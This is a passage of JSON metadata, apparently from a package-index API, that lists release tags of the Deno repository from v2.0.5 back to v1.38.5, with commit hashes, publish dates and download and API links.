d%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/